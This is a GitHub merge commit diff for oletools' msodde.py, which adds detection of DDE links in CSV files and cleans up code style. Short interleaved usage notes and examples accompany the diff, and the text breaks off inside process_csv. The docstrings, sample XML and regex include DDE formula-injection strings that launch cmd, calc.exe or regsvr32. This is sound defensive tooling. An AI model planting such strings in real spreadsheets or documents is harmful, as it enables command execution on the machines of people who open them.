Commit 95ca88d297935a2de9175b92152713b64d3f6e6c

Authored by Philippe Lagadec
Committed by GitHub
Parents: 56ed93a1, 874a5105

Merge pull request #241 from christian-intra2net/dde-in-csv

DDE in CSV: detect DDE links in CSV files (exported from / imported into Excel).
oletools/msodde.py
@@ -9,6 +9,7 @@ Supported formats:
 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
 - RTF
+- CSV (exported from / imported into Excel)
 
 Author: Philippe Lagadec - http://www.decalage.info
 License: BSD, see source code or documentation
@@ -17,39 +18,72 @@ msodde is part of the python-oletools package:
 http://www.decalage.info/python/oletools
 """
 
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
 
 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
 # All rights reserved.
 #
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
 #
-#  * Redistributions of source code must retain the above copyright notice, this
-#    list of conditions and the following disclaimer.
+#  * Redistributions of source code must retain the above copyright notice,
+#    this list of conditions and the following disclaimer.
 #  * Redistributions in binary form must reproduce the above copyright notice,
 #    this list of conditions and the following disclaimer in the documentation
 #    and/or other materials provided with the distribution.
 #
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -- IMPORTS ------------------------------------------------------------------
 
 from __future__ import print_function
 
-#------------------------------------------------------------------------------
+import argparse
+import zipfile
+import os
+from os.path import abspath, dirname
+import sys
+import json
+import logging
+import re
+import csv
+
+# import lxml or ElementTree for XML parsing:
+try:
+    # lxml: best performance for XML processing
+    import lxml.etree as ET
+except ImportError:
+    import xml.etree.cElementTree as ET
+
+# little hack to allow absolute imports even if oletools is not installed
+# Copied from olevba.py
+PARENT_DIR = dirname(dirname(abspath(__file__)))
+if PARENT_DIR not in sys.path:
+    sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+
+from oletools.thirdparty import olefile
+from oletools import ooxml
+from oletools import xls_parser
+from oletools import rtfobj
+
+# -----------------------------------------------------------------------------
 # CHANGELOG:
 # 2017-10-18 v0.52 PL: - first version
 # 2017-10-20       PL: - fixed issue #202 (handling empty xml tags)
 # 2017-10-23       ES: - add check for fldSimple codes
-# 2017-10-24       ES: - group tags and track begin/end tags to keep DDE strings together
+# 2017-10-24       ES: - group tags and track begin/end tags to keep DDE
+#                         strings together
 # 2017-10-25       CH: - add json output
 # 2017-10-25       CH: - parse doc
 #                  PL: - added logging
@@ -59,10 +93,11 @@ from __future__ import print_function
 # 2017-11-29       CH: - added support for xlsb files
 # 2017-11-29       PL: - added support for RTF files (issue #223)
 # 2017-12-07       CH: - ensure rtf file is closed
+# 2018-01-05       CH: - add CSV
 
-__version__ = '0.52dev9'
+__version__ = '0.52dev10'
 
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
 # TODO: field codes can be in headers/footers/comments - parse these
 # TODO: generalize behaviour for xlsx: find all external links (maybe rename
 #       command line flag for "blacklist" to "find all suspicious" or so)
@@ -71,40 +106,10 @@ __version__ = '0.52dev9'
 #       DDE-Links
 # TODO: avoid reading complete rtf file data into memory
 
-#------------------------------------------------------------------------------
+# -----------------------------------------------------------------------------
 # REFERENCES:
 
 
-#--- IMPORTS ------------------------------------------------------------------
-
-import argparse
-import zipfile
-import os
-import sys
-import json
-import logging
-import re
-from struct import unpack
-
-# import lxml or ElementTree for XML parsing:
-try:
-    # lxml: best performance for XML processing
-    import lxml.etree as ET
-except ImportError:
-    import xml.etree.cElementTree as ET
-
-# little hack to allow absolute imports even if oletools is not installed
-# Copied from olevba.py
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-if not _parent_dir in sys.path:
-    sys.path.insert(0, _parent_dir)
-
-from oletools.thirdparty import olefile
-from oletools import ooxml
-from oletools import xls_parser
-from oletools import rtfobj
-
 # === PYTHON 2+3 SUPPORT ======================================================
 
 if sys.version_info[0] >= 3:
@@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD
 TAG_W_R = "{%s}r" % NS_WORD
 ATTR_W_INSTR = '{%s}instr' % NS_WORD
 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD
-LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml']
+LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
+             'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
+             'word/footer2.xml', 'word/comments.xml')
 
 # list of acceptable, harmless field instructions for blacklist field mode
 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
@@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/
 #  switches_with_args, switches_without_args, format_switches)
 FIELD_BLACKLIST = (
     # date and time:
-    ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),
-    ('DATE', 0, 0, '', 'hls', 'datetime'),
-    ('EDITTIME', 0, 0, '', '', 'numeric'),
-    ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),
-    ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),
-    ('TIME', 0, 0, '', '', 'datetime'),
+    ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),  # pylint: disable=bad-whitespace
+    ('DATE', 0, 0, '', 'hls', 'datetime'),  # pylint: disable=bad-whitespace
+    ('EDITTIME', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),  # pylint: disable=bad-whitespace
+    ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),  # pylint: disable=bad-whitespace
+    ('TIME', 0, 0, '', '', 'datetime'),  # pylint: disable=bad-whitespace
     # exclude document automation (we hate the "auto" in "automation")
     # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
     # document information
-    ('AUTHOR', 0, 1, '', '', 'string'),
-    ('COMMENTS', 0, 1, '', '', 'string'),
-    ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),
-    ('FILENAME', 0, 0, '', 'p', 'string'),
-    ('FILESIZE', 0, 0, '', 'km', 'numeric'),
-    ('KEYWORDS', 0, 1, '', '', 'string'),
-    ('LASTSAVEDBY', 0, 0, '', '', 'string'),
-    ('NUMCHARS', 0, 0, '', '', 'numeric'),
-    ('NUMPAGES', 0, 0, '', '', 'numeric'),
-    ('NUMWORDS', 0, 0, '', '', 'numeric'),
-    ('SUBJECT', 0, 1, '', '', 'string'),
-    ('TEMPLATE', 0, 0, '', 'p', 'string'),
-    ('TITLE', 0, 1, '', '', 'string'),
+    ('AUTHOR', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('COMMENTS', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),  # pylint: disable=bad-whitespace
+    ('FILENAME', 0, 0, '', 'p', 'string'),  # pylint: disable=bad-whitespace
+    ('FILESIZE', 0, 0, '', 'km', 'numeric'),  # pylint: disable=bad-whitespace
+    ('KEYWORDS', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('LASTSAVEDBY', 0, 0, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('NUMCHARS', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('NUMPAGES', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('NUMWORDS', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('SUBJECT', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('TEMPLATE', 0, 0, '', 'p', 'string'),  # pylint: disable=bad-whitespace
+    ('TITLE', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
     # equations and formulas
-    # exlude '=' formulae because they have different syntax
-    ('ADVANCE', 0, 0, 'dlruxy', '', ''),
-    ('SYMBOL', 1, 0, 'fs', 'ahju', ''),
+    # exlude '=' formulae because they have different syntax (and can be bad)
+    ('ADVANCE', 0, 0, 'dlruxy', '', ''),  # pylint: disable=bad-whitespace
+    ('SYMBOL', 1, 0, 'fs', 'ahju', ''),  # pylint: disable=bad-whitespace
     # form fields
-    ('FORMCHECKBOX', 0, 0, '', '', ''),
-    ('FORMDROPDOWN', 0, 0, '', '', ''),
-    ('FORMTEXT', 0, 0, '', '', ''),
+    ('FORMCHECKBOX', 0, 0, '', '', ''),  # pylint: disable=bad-whitespace
+    ('FORMDROPDOWN', 0, 0, '', '', ''),  # pylint: disable=bad-whitespace
+    ('FORMTEXT', 0, 0, '', '', ''),  # pylint: disable=bad-whitespace
     # index and tables
-    ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),
+    ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),  # pylint: disable=bad-whitespace
     # exlude RD since that imports data from other files
-    ('TA', 0, 0, 'clrs', 'bi', ''),
-    ('TC', 1, 0, 'fl', 'n', ''),
-    ('TOA', 0, 0, 'bcdegls', 'fhp', ''),
-    ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),
-    ('XE', 1, 0, 'frty', 'bi', ''),
+    ('TA', 0, 0, 'clrs', 'bi', ''),  # pylint: disable=bad-whitespace
+    ('TC', 1, 0, 'fl', 'n', ''),  # pylint: disable=bad-whitespace
+    ('TOA', 0, 0, 'bcdegls', 'fhp', ''),  # pylint: disable=bad-whitespace
+    ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),  # pylint: disable=bad-whitespace
+    ('XE', 1, 0, 'frty', 'bi', ''),  # pylint: disable=bad-whitespace
     # links and references
     # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
-    ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),
-    ('CITATION', 1, 0, 'lfspvm', 'nty', ''),
+    ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),  # pylint: disable=bad-whitespace
+    ('CITATION', 1, 0, 'lfspvm', 'nty', ''),  # pylint: disable=bad-whitespace
     # exclude HYPERLINK since we are allergic to URLs
     # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
     # exclude LINK and REF (could reference other files)
-    ('NOTEREF', 1, 0, '', 'fhp', ''),
-    ('PAGEREF', 1, 0, '', 'hp', ''),
-    ('QUOTE', 1, 0, '', '', 'datetime'),
-    ('STYLEREF', 1, 0, '', 'lnprtw', ''),
+    ('NOTEREF', 1, 0, '', 'fhp', ''),  # pylint: disable=bad-whitespace
+    ('PAGEREF', 1, 0, '', 'hp', ''),  # pylint: disable=bad-whitespace
+    ('QUOTE', 1, 0, '', '', 'datetime'),  # pylint: disable=bad-whitespace
+    ('STYLEREF', 1, 0, '', 'lnprtw', ''),  # pylint: disable=bad-whitespace
     # exclude all Mail Merge commands since they import data from other files
     # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
     # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
     # Numbering
-    ('LISTNUM', 0, 1, 'ls', '', ''),
-    ('PAGE', 0, 0, '', '', 'numeric'),
-    ('REVNUM', 0, 0, '', '', ''),
-    ('SECTION', 0, 0, '', '', 'numeric'),
-    ('SECTIONPAGES', 0, 0, '', '', 'numeric'),
-    ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),
-    # user information
-    ('USERADDRESS', 0, 1, '', '', 'string'),
-    ('USERINITIALS', 0, 1, '', '', 'string'),
-    ('USERNAME', 0, 1, '', '', 'string'),
+    ('LISTNUM', 0, 1, 'ls', '', ''),  # pylint: disable=bad-whitespace
+    ('PAGE', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('REVNUM', 0, 0, '', '', ''),  # pylint: disable=bad-whitespace
+    ('SECTION', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('SECTIONPAGES', 0, 0, '', '', 'numeric'),  # pylint: disable=bad-whitespace
+    ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),  # pylint: disable=bad-whitespace
+    # user information  # pylint: disable=bad-whitespace
+    ('USERADDRESS', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('USERINITIALS', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
+    ('USERNAME', 0, 1, '', '', 'string'),  # pylint: disable=bad-whitespace
 )
 
 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
 
+# filter modes
 FIELD_FILTER_DDE = 'only dde'
 FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
 FIELD_FILTER_ALL = 'keep all'
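
Note on the table above: each blacklist entry is read as (command, nargs_required, nargs_optional, switches_with_args, switches_without_args, format_switches), matching the unpacking in field_is_blacklisted() further down. A hedged illustration of one entry (the assert is just for clarity, not part of the module):

    # ('DATE', 0, 0, '', 'hls', 'datetime') means: the DATE field takes no
    # required and no optional arguments, has no switches that need their own
    # argument, allows the stand-alone switches \h, \l and \s, and may carry
    # a datetime format switch such as \@ "dd.MM.yyyy" (example values here
    # are illustrative).
    entry = ('DATE', 0, 0, '', 'hls', 'datetime')
    cmd, nargs_req, nargs_opt, sw_with_arg, sw_solo, sw_format = entry
    assert cmd == 'DATE' and 'l' in sw_solo and sw_format == 'datetime'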
@@ -229,6 +237,7 @@ LOG_LEVELS = {
     'critical': logging.CRITICAL
 }
 
+
 class NullHandler(logging.Handler):
     """
     Log Handler without output, to avoid printing messages if logging is not
@@ -239,6 +248,7 @@ class NullHandler(logging.Handler):
     def emit(self, record):
         pass
 
+
 def get_logger(name, level=logging.CRITICAL+1):
     """
     Create a suitable logger object for this module.
@@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1):
     # First, test if there is already a logger with the same name, else it
     # will generate duplicate messages (due to duplicate handlers):
     if name in logging.Logger.manager.loggerDict:
-        #NOTE: another less intrusive but more "hackish" solution would be to
+        # NOTE: another less intrusive but more "hackish" solution would be to
         # use getLogger then test if its effective level is not default.
         logger = logging.getLogger(name)
         # make sure level is OK:
@@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode():
     # try to find encoding for sys.stdout
     encoding = None
     try:
-        encoding = sys.stdout.encoding  # variable encoding might not exist
-    except Exception:
+        encoding = sys.stdout.encoding
+    except AttributeError:  # variable "encoding" might not exist
         pass
 
     if encoding not in (None, '', 'ascii'):
@@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode():
     sys.stdout = wrapper(sys.stdout)
 
 
-ensure_stdout_handles_unicode()  # e.g. for print(text) in main()
+if sys.version_info.major < 3:
+    ensure_stdout_handles_unicode()  # e.g. for print(text) in main()
 
 
 # === ARGUMENT PARSING =======================================================
@@ -338,28 +349,34 @@ def existing_file(filename):
 
 def process_args(cmd_line_args=None):
     """ parse command line arguments (given ones or per default sys.argv) """
-    parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
+    parser = ArgParserWithBanner(description='A python tool to detect and '
+                                 'extract DDE links in MS Office files')
     parser.add_argument("filepath", help="path of the file to be analyzed",
                         type=existing_file, metavar='FILE')
     parser.add_argument('-j', "--json", action='store_true',
                         help="Output in json format. Do not use with -ldebug")
-    parser.add_argument("--nounquote", help="don't unquote values",action='store_true')
-    parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
-                        help="logging level debug/info/warning/error/critical (default=%(default)s)")
+    parser.add_argument("--nounquote", help="don't unquote values",
+                        action='store_true')
+    parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
+                        default=DEFAULT_LOG_LEVEL,
+                        help="logging level debug/info/warning/error/critical "
+                             "(default=%(default)s)")
     filter_group = parser.add_argument_group(
-        title='Filter which OpenXML field commands are returned',
-        description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
-                    '(e.g. .doc). These options are mutually exclusive, last '
-                    'option found on command line overwrites earlier ones.')
+        title='Filter which OpenXML field commands are returned',
+        description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
+                    '(e.g. .doc). These options are mutually exclusive, last '
+                    'option found on command line overwrites earlier ones.')
     filter_group.add_argument('-d', '--dde-only', action='store_const',
                               dest='field_filter_mode', const=FIELD_FILTER_DDE,
                               help='Return only DDE and DDEAUTO fields')
     filter_group.add_argument('-f', '--filter', action='store_const',
-                              dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST,
-                              help='Return all fields except harmless ones like PAGE')
+                              dest='field_filter_mode',
+                              const=FIELD_FILTER_BLACKLIST,
+                              help='Return all fields except harmless ones')
     filter_group.add_argument('-a', '--all-fields', action='store_const',
                               dest='field_filter_mode', const=FIELD_FILTER_ALL,
-                              help='Return all fields, irrespective of their contents')
+                              help='Return all fields, irrespective of their '
+                                   'contents')
     parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
 
     return parser.parse_args(cmd_line_args)
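
The parser above can also be driven from Python instead of the shell; a minimal sketch (the positional FILE argument is validated by existing_file(), so the path must point at a file that really exists — 'sample.docx' is a placeholder):

    from oletools import msodde

    args = msodde.process_args(['sample.docx', '--dde-only', '-l', 'debug'])
    assert args.field_filter_mode == msodde.FIELD_FILTER_DDE
    assert args.loglevel == 'debug'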
@@ -368,16 +385,19 @@ def process_args(cmd_line_args=None):
 # === FUNCTIONS ==============================================================
 
 # from [MS-DOC], section 2.8.25 (PlcFld):
-# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
-# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
-# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
-# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
-# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
-# the field end character. This is the field separator. The field result is the content between the field
-# separator and the field end character. The field instructions are the content between the field begin
-# character and the field separator, if one is present, or between the field begin character and the field
-# end character if no separator is present. The field begin character, field end character, and field
-# separator are collectively referred to as field characters.
+# A field consists of two parts: field instructions and, optionally, a result.
+# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
+# with a value of 1. This is the field begin character. All fields MUST end
+# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
+# This is the field end character. If the field has a result, then there MUST
+# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
+# somewhere between the field begin character and the field end character. This
+# is the field separator. The field result is the content between the field
+# separator and the field end character. The field instructions are the content
+# between the field begin character and the field separator, if one is present,
+# or between the field begin character and the field end character if no
+# separator is present. The field begin character, field end character, and
+# field separator are collectively referred to as field characters.
 
 
 def process_doc_field(data):
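
A worked illustration of the [MS-DOC] field layout quoted above, using the three special field characters (a sketch for understanding, not parser code from this module; the DDE payload is made up):

    FIELD_BEGIN = u'\x13'  # field begin character
    FIELD_SEP = u'\x14'    # field separator, precedes the optional result
    FIELD_END = u'\x15'    # field end character

    field = FIELD_BEGIN + u'DDEAUTO cmd "/k calc.exe"' + FIELD_SEP \
            + u'(field result)' + FIELD_END
    instructions = field[1:field.index(FIELD_SEP)]
    assert instructions == u'DDEAUTO cmd "/k calc.exe"'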
@@ -387,7 +407,6 @@ def process_doc_field(data):
     log.debug('processing field \'{0}\''.format(data))
 
     if data.lstrip().lower().startswith(u'dde'):
-        #log.debug('--> is DDE!')
         return data
     elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
         return data
@@ -512,7 +531,6 @@ def process_doc(filepath):
     return u'\n'.join(links)
 
 
-
 def process_xls(filepath):
     """ find dde links in excel ole file """
 
@@ -531,17 +549,15 @@
 
 
 def process_docx(filepath, field_filter_mode=None):
+    """ find dde-links (and other fields) in Word 2007+ files """
     log.debug('process_docx')
     all_fields = []
-    with zipfile.ZipFile(filepath) as z:
-        for filepath in z.namelist():
+    with zipfile.ZipFile(filepath) as zipper:
+        for filepath in zipper.namelist():
             if filepath in LOCATIONS:
-                data = z.read(filepath)
+                data = zipper.read(filepath)
                 fields = process_xml(data)
                 if len(fields) > 0:
-                    #print ('DDE Links in %s:'%filepath)
-                    #for f in fields:
-                    #    print(f)
                     all_fields.extend(fields)
 
     # apply field command filter
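
Usage sketch for the function above (the file name is a placeholder): process_docx() walks the zip members listed in LOCATIONS and returns all matching field commands joined by newlines.

    from oletools import msodde

    for field in msodde.process_docx('sample-dde.docx').splitlines():
        print(field)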
@@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None):
                   .format(field_filter_mode))
 
     return u'\n'.join(clean_fields)
-
+
+
 def process_xml(data):
+    """ Find dde-links and other fields in office XML data """
     # parse the XML data:
     root = ET.fromstring(data)
     fields = []
@@ -569,39 +587,41 @@
     level = 0
     # find all the tags 'w:p':
     # parse each for begin and end tags, to group DDE strings
-    # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags
+    # fldChar can be in either a w:r element, floating alone in the w:p
+    # or spread accross w:p tags
     # escape DDE if quoted etc
     # (each is a chunk of a DDE link)
 
     for subs in root.iter(TAG_W_P):
         elem = None
-        for e in subs:
-            #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT
-            if e.tag == TAG_W_R:
-                for child in e:
-                    if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT:
+        for curr_elem in subs:
+            # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
+            if curr_elem.tag == TAG_W_R:
+                for child in curr_elem:
+                    if child.tag == TAG_W_FLDCHAR or \
+                            child.tag == TAG_W_INSTRTEXT:
                         elem = child
                         break
             else:
-                elem = e
-            #this should be an error condition
+                elem = curr_elem
+            # this should be an error condition
             if elem is None:
                 continue
-
-            #check if FLDCHARTYPE and whether "begin" or "end" tag
+
+            # check if FLDCHARTYPE and whether "begin" or "end" tag
             if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None:
                 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin":
-                    level += 1 
+                    level += 1
                 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end":
                     level -= 1
-                    if level == 0 or level == -1 :  # edge-case where level becomes -1
+                    if level == 0 or level == -1:  # edge-case; level becomes -1
                         fields.append(ddetext)
                         ddetext = u''
-                        level = 0 # reset edge-case
-
+                        level = 0  # reset edge-case
+
             # concatenate the text of the field, if present:
             if elem.tag == TAG_W_INSTRTEXT and elem.text is not None:
-                #expand field code if QUOTED
+                # expand field code if QUOTED
                 ddetext += unquote(elem.text)
 
     for elem in root.iter(TAG_W_FLDSIMPLE):
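
For reference, a minimal WordprocessingML snippet of the shape this loop handles: a fldChar "begin" run, instrText chunks that get concatenated, and a fldChar "end" run. The DDE payload is illustrative, and NS_WORD is assumed to be the standard WordprocessingML main namespace:

    from oletools import msodde

    xml_data = (
        b'<w:document xmlns:w="http://schemas.openxmlformats.org/'
        b'wordprocessingml/2006/main"><w:body><w:p>'
        b'<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        b'<w:r><w:instrText>DDEAUTO cmd "/k calc.exe"</w:instrText></w:r>'
        b'<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        b'</w:p></w:body></w:document>')

    print(msodde.process_xml(xml_data))  # -> ['DDEAUTO cmd "/k calc.exe"']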
@@ -611,25 +631,28 @@
 
     return fields
 
-def unquote(field):
+
+def unquote(field):
     if "QUOTE" not in field or NO_QUOTES:
         return field
-    #split into components
+    # split into components
     parts = field.strip().split(" ")
     ddestr = ""
-    for p in parts[1:]:
-        try:
-            ch = chr(int(p))
+    for part in parts[1:]:
+        try:
+            character = chr(int(part))
         except ValueError:
-            ch = p
-        ddestr += ch
+            character = part
+        ddestr += character
     return ddestr
 
+
 # "static variables" for field_is_blacklisted:
 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
 
+
 def field_is_blacklisted(contents):
     """ Check if given field contents matches any in FIELD_BLACKLIST
 
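
Worked example for the unquote() rewrite above: Word sometimes hides field text as 'QUOTE' followed by decimal character codes, which unquote() turns back into characters (non-numeric parts pass through unchanged):

    msodde.unquote('QUOTE 99 109 100')  # 99/109/100 -> u'cmd'
    msodde.unquote('DDEAUTO cmd /k')    # no 'QUOTE' -> returned unchanged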
@@ -651,7 +674,7 @@ def field_is_blacklisted(contents):
         index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
     except ValueError:  # first word is no blacklisted command
         return False
-    log.debug('trying to match "{0}" to blacklist command {0}'
+    log.debug('trying to match "{0}" to blacklist command {1}'
               .format(contents, FIELD_BLACKLIST[index]))
     _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
         = FIELD_BLACKLIST[index]
@@ -706,14 +729,15 @@ def field_is_blacklisted(contents):
         if 'numeric' in sw_format:
             arg_choices = []  # too many choices to list them here
         else:
-            log.debug('unexpected switch {0} in "{1}"'.format(switch, contents))
+            log.debug('unexpected switch {0} in "{1}"'
+                      .format(switch, contents))
             return False
 
     # if nothing went wrong sofar, the contents seems to match the blacklist
     return True
 
 
-def process_xlsx(filepath, filed_filter_mode=None):
+def process_xlsx(filepath):
     """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
     dde_links = []
     parser = ooxml.XmlParser(filepath)
@@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None):
         try:
             logging.info('Parsing non-xml subfile {0} with content type {1}'
                          .format(subfile, content_type))
-            for record in xls_parser.parse_xlsb_part(handle, content_type, subfile):
+            for record in xls_parser.parse_xlsb_part(handle, content_type,
+                                                     subfile):
                 logging.debug('{0}: {1}'.format(subfile, record))
                 if isinstance(record, xls_parser.XlsbBeginSupBook) and \
                         record.link_type == \
@@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser):
 
 RTF_START = b'\x7b\x5c\x72\x74'  # == b'{\rt' but does not mess up auto-indent
 
+
 def process_rtf(file_handle, field_filter_mode=None):
-    log.debug('process_rtf')
+    """ find dde links or other fields in rtf file """
     all_fields = []
     data = RTF_START + file_handle.read()  # read complete file into memory!
     file_handle.close()
@@ -818,35 +844,119 @@
     return u'\n'.join(clean_fields)
 
 
+# threshold when to consider a csv file "small"; also used as sniffing size
+CSV_SMALL_THRESH = 1024
+
+# format of dde link: program-name | arguments ! unimportant
+CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
+
+# allowed delimiters (python sniffer would use nearly any char). Taken from
+# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
+CSV_DELIMITERS = ',\t ;|^'
+
+
+def process_csv(filepath):
+    """ find dde in csv text
+
+    finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
+    =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
+
+    Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
+    chars the same way that excel does. Tested to some extend in unittests.
+
+    This can only find DDE-links, no other "suspicious" constructs (yet).
+    """
+
+    results = []
+    with open(filepath, 'r') as file_handle:
+        results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
+        is_small = file_handle.tell() < CSV_SMALL_THRESH
+
+        if is_small and not results:
+            # easy to mis-sniff small files. Try different delimiters
+            log.debug('small file, no results; try all delimiters')
